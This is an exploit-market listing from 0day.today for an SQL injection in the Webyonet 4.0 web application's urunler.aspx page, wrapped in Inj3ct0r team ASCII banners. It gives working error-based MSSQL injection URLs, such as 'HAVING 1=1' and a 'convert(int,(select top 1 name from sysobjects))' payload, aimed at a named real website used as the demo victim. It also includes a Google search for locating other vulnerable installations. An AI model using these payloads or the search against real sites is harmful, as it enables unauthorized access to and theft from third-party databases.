[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Webyonet 4.0 - Remote (urunler.aspx) SQL Injection Vulnerability

Author
KnocKout
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14562
Category
web applications
Date add
23-10-2010
Platform
php
================================================================
Webyonet 4.0 - Remote (urunler.aspx) SQL Injection Vulnerability
================================================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ######################################            1
0                    I'm KnocKout member from Inj3ct0r Team            1
1                    ######################################            0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Webyonet
|~Price : N/A
|~Version : 4.0
|~Software: http://www.webyonet.com
|~Vulnerability Style : SQL Injection
|~Vulnerability Dir : /turkce
|~sqL : MSSQL 2000 with error
|~Google Keyword : http://www.google.com.tr/webhp?hl=tr#q=%22Weby%C3%B6net+S%C3%BCr%C3%BCm+4.0%22&hl=tr&biw=1280&bih=813&ei=3o3ATKT7I4KQjAf8uJyjCg&start=30&sa=N&fp=983538213d28a2b7
|~Good.:)
|[~]Date : "21.10.2010"
|[~]Tested on : (L):Vista (R):Microsoft-IIS/6.0 -MSSQL
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Demo: http://www.palmeyayinevi.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ===============================================================
    |{~~~~~~~~ Explotation| MSSQL 2000 with error~~~~~~~~~~~}|
    
    http://VICTIM/$path/urunler.aspx?id=-0 {SQL Injection}
    
    Ex; http://www.palmeyayinevi.com
    
    [~] SQL Injecting
    http://www.palmeyayinevi.com/turkce/urunler.aspx?id=-00000 HAVING 1=1
    [~] MSSQL Error : Column 'urun.durum' is invalid in the HAVING .. / etc etc.. 
    
    To your Continue..
    
    [~] SQL Injecting
    http://www.palmeyayinevi.com/turkce/urunler.aspx?id=-00000 and 1=convert(int,(select top 1 name from sysobjects))
    
     .. 
    =============================================================



#  0day.today [2024-11-15]  #